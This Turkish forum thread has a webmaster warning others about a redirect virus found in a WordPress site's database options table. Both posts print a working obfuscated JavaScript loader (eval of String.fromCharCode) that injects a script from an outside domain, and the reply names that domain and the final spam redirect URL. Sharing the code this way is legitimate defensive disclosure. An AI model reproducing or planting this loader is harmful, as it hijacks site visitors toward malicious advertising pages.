• 25-01-2023, 20:16:26
    #1
    Merhabalar;

    Mutlaka karşılaşan olacaktır diye düşünerek paylaşmak istedim. Google reklamlarında ve indekslerde sorun çıkaran ve sadece yeni giren kullanıcılara gözükmesi ile tespiti biraz zor bir virüs önce bu adrese arkasından reklam adresine yönlendiriyor kod aşağıdakine benzer ;

    Veritabınında <script></script>arasında veya direk ağaıdaki gibi bulunabiliyor ama nereden eklendiğine dair herhangi bir fikrim yok. karşılaşan arkadaşlar veritabanın sildiğinizde sorunu kısmen çözmüş oluyorsunuz ama tekrar üretebilen bir kod eklemişlermidir bilemiyorum. ekstra deneyimlerimi paylaşacağım. _options tablosu altında _settings variablesinde bulduk.

    destekleri için @yalinyalniz; 'a teşekkürler.

    eval(String.fromCharCode(118,97,114,32,116,114,111,110,109,111,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,116,114,111,110,109,111,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,116,114,111,110,109,111,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,116,114,111,110,109,111,91,105,93,46,105,100,32,61,61,32,34,115,108,111,119,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,111,119,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,57,57,44,49,48,48,44,49,49,48,44,52,54,44,49,49,56,44,49,48,53,44,49,49,49,44,49,48,56,44,49,48,49,44,49,49,54,44,49,48,56,44,49,49,49,44,49,49,56,44,49,48,49,44,49,48,56,44,49,48,53,44,49,49,48,44,49,48,49,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,49,53,44,52,55,44,49,48,51,44,49,48,56,44,49,49,49,44,57,56,44,57,55,44,49,48,56,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,52,44,52,54,44,53,55,44,52,54,44,53,53,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));
  • 25-01-2023, 20:21:43
    #2
    EurasiaCreative adlı üyeden alıntı: mesajı görüntüle
    Merhabalar;

    Mutlaka karşılaşan olacaktır diye düşünerek paylaşmak istedim. Google reklamlarında ve indekslerde sorun çıkaran ve sadece yeni giren kullanıcılara gözükmesi ile tespiti biraz zor bir virüs önce bu adrese arkasından reklam adresine yönlendiriyor kod aşağıdakine benzer ;

    Veritabınında <script></script>arasında veya direk ağaıdaki gibi bulunabiliyor ama nereden eklendiğine dair herhangi bir fikrim yok. karşılaşan arkadaşlar veritabanın sildiğinizde sorunu kısmen çözmüş oluyorsunuz ama tekrar üretebilen bir kod eklemişlermidir bilemiyorum. ekstra deneyimlerimi paylaşacağım. _options tablosu altında _settings variablesinde bulduk.

    destekleri için @yalinyalniz; 'a teşekkürler.

    eval(String.fromCharCode(118,97,114,32,116,114,111,110,109,111,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,116,114,111,110,109,111,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,116,114,111,110,109,111,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,116,114,111,110,109,111,91,105,93,46,105,100,32,61,61,32,34,115,108,111,119,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,111,119,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,57,57,44,49,48,48,44,49,49,48,44,52,54,44,49,49,56,44,49,48,53,44,49,49,49,44,49,48,56,44,49,48,49,44,49,49,54,44,49,48,56,44,49,49,49,44,49,49,56,44,49,48,49,44,49,48,56,44,49,48,53,44,49,49,48,44,49,48,49,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,49,53,44,52,55,44,49,48,51,44,49,48,56,44,49,49,49,44,57,56,44,57,55,44,49,48,56,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,52,44,52,54,44,53,55,44,52,54,44,53,53,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));
    Virüs bu URL'i JS olarak sunuyor obfuscate'li kodda.
    https://cdn.violetlovelines.com/scri...bal.js?v=6.9.7

    Bu URL de nihai hedef, belli şartlarda tetikleniyor
    https://shop.similarwebline.com/v8Lsdq?&se_referrer=